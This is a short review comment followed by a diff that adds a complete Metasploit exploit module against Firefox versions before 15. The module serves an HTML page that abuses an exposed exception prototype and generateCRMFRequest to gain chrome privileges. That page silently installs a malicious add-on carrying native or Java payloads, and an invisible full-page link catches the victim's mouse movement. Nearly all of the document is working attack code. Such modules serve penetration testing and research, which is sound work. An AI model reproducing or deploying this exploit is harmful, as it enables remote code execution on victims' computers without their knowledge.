It helps to actually commit the exploit.

modules/exploits/multi/browser/firefox_proto_crmfrequest.rb

@@ -0,0 +1,127 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::FirefoxAddonGenerator
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Firefox < 15 exposedProps XCS Code Execution',
+      'Description'    => %q{
+        On versions of Firefox before 15.0, the InstallTrigger object, when given
+        invalid input, would throw an exception that did not have an __exposedProps__
+        property set. By re-setting the property on the exception's prototype,
+        the chrome-based defineProperty method is made available.
+
+        With the defineProperty method, an overriden callback can be defined
+        that gets called from chrome-privileged context. From here, another
+        vulnerability is used to "peek" into the context's private scope. Unfortunately
+        the "good" parts of Components.classes are not available (we don't have a
+        chrome:// URL), so instead the AddonManager API is invoked to silently install
+        a malicious plugin.
+
+        Note: this exploit requires the user move their mouse at least 1px inside of
+        the browser window.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'        => [ 'joev' ],
+      'Platform'      => %w{ java linux osx solaris win },
+      'Targets'       =>
+        [
+          [ 'Generic (Java Payload)',
+            {
+              'Platform' => ['java'],
+              'Arch' => ARCH_JAVA
+            }
+          ],
+          [ 'Windows x86 (Native Payload)',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_X86,
+            }
+          ],
+          [ 'Linux x86 (Native Payload)',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X86,
+            }
+          ],
+          [ 'Mac OS X PPC (Native Payload)',
+            {
+              'Platform' => 'osx',
+              'Arch' => ARCH_PPC,
+            }
+          ],
+          [ 'Mac OS X x86 (Native Payload)',
+            {
+              'Platform' => 'osx',
+              'Arch' => ARCH_X86,
+            }
+          ]
+        ],
+      'DefaultTarget'  => 1
+    ))
+
+    register_options(
+      [
+        OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] )
+      ], Auxiliary::Timed)
+
+  end
+
+  def exploit
+    super
+  end
+
+  def on_request_uri(cli, request)
+    if request.uri.match(/\.xpi$/i)
+      send_response( cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' } )
+    else
+      send_response_html(cli, generate_html)
+    end
+  end
+
+  def generate_html
+    %Q|
+<html>
+<body>
+#{datastore['CONTENT']}
+<div id='payload' style='display:none'>
+if (!window.AddonManager.found) {
+  window.AddonManager.getInstallForURL(
+    '#{get_uri}/addon.xpi',
+    function(install) { install.install() },
+    'application/x-xpinstall'
+  );
+}
+</div>
+<script>
+var s = document.querySelector('#payload').innerHTML;
+try{InstallTrigger.install(0)}catch(e){p=Object.getPrototypeOf(Object.getPrototypeOf(e));};
+p.__exposedProps__={
+  constructor:'rw',
+  prototype:'rw',
+  defineProperty:'rw',
+  __exposedProps__:'rw'
+};
+var register = function(obj,key) {
+p.constructor.defineProperty(obj,key,{value:function(){
+  window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 1024, null, "rsa-ex");
+}});
+};
+register(document, 'compareDocumentPosition');
+</script>
+<a href='#' title='heh' style='position:absolute;display:block;top:0;left:0;right:0;bottom:0;'>  </a>
+</body>
+</html>
+    |
+  end
+end